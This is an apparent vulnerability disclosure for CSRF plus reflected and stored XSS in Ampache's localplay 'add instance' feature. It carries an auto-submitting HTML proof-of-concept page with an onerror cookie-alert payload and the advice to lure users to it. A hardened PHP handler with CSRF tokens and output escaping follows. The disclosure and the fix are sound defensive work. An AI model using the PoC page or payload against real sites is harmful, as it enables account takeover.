CSRF, Reflected XSS and Stored XSS in add instance function in ampache/ampache
Valid
Reported on
Jan 15th 2023
Description
The add instance function creates a localplay instance from user input but applies no sanitizing to that input, which results in a reflected XSS bug. Any user in the system, including guest users, can use this feature. Once created, the instance is saved on the system, and whenever someone next executes the add instance function the payload is triggered again. This is the stored XSS.
Proof of Concept
// exploit.html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8888/ampache-5.5.6_all_php7.4/public/localplay.php?action=add_instance" method="POST">
<input type="hidden" name="name" value="test<img/src=x onerror=alert(document.cookie)>" />
<input type="hidden" name="host" value="test" />
<input type="hidden" name="port" value="80" />
<input type="hidden" name="password" value="80" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Host this file on the internet, then send a link to it to any user: the JavaScript code will execute and an instance will be created.
Impact
Runs JavaScript code in the victim's session, which leads to account takeover and allows the attacker to perform actions as that user.
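The report describes two missing controls: the POST that creates an instance is not tied to the user's session (CSRF), and the instance name is echoed back into HTML unescaped, both immediately and again after it has been stored. The following is an added example of a hardened handler written for this page; it is not Ampache's code, and the field names, the in-memory `$instances` store and the single-page form are assumptions made for illustration. It issues a per-session CSRF token, rejects POSTs that do not carry it, validates the port, and escapes the stored name at render time so the `<img/src=x onerror=...>` payload from the PoC is shown as text rather than executed.

```php
<?php
// Added example, not Ampache's code. Hardened "add instance" handler:
// CSRF token + output escaping. Store, field names and layout are assumptions.
declare(strict_types=1);

// HttpOnly limits what an XSS can read via document.cookie; SameSite=Lax
// stops the cross-site form POST from the PoC carrying the session cookie.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// Issue one random token per session and embed it in every state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject a POST whose token is missing or differs (constant-time comparison).
function csrf_check(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    return isset($_SESSION['csrf_token'])
        && is_string($sent)
        && hash_equals($_SESSION['csrf_token'], $sent);
}

// Escape for HTML text and attribute contexts. Applied at output, so it covers
// both the reflected case and the stored value read back later.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed in-memory store standing in for the database (assumption).
$instances = [];

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    $name = (string) ($_POST['name'] ?? '');
    $host = (string) ($_POST['host'] ?? '');
    $port = filter_var(
        $_POST['port'] ?? '',
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 65535]]
    );
    if ($name === '' || $host === '' || $port === false) {
        http_response_code(400);
        exit('Invalid input');
    }
    // Keep the raw value in storage; escaping belongs to the rendering context.
    $instances[] = ['name' => $name, 'host' => $host, 'port' => $port];
}
?>
<form method="POST" action="">
  <input type="hidden" name="csrf_token" value="<?= h(csrf_token()) ?>">
  <label>Name <input name="name"></label>
  <label>Host <input name="host"></label>
  <label>Port <input name="port" value="6600"></label>
  <button type="submit">Add instance</button>
</form>

<ul>
<?php foreach ($instances as $i): ?>
  <!-- A stored name of test<img/src=x onerror=alert(1)> renders as literal text here. -->
  <li><?= h($i['name']) ?> (<?= h($i['host']) ?>:<?= (int) $i['port'] ?>)</li>
<?php endforeach; ?>
</ul>
```

The cross-site page in the PoC cannot read the victim's token, so its forged POST fails the `csrf_check` even if the SameSite cookie attribute is not honoured by the browser; escaping with `htmlspecialchars` in the `ENT_QUOTES` mode is what prevents the name from breaking out of an HTML context, whichever path it reaches the page by.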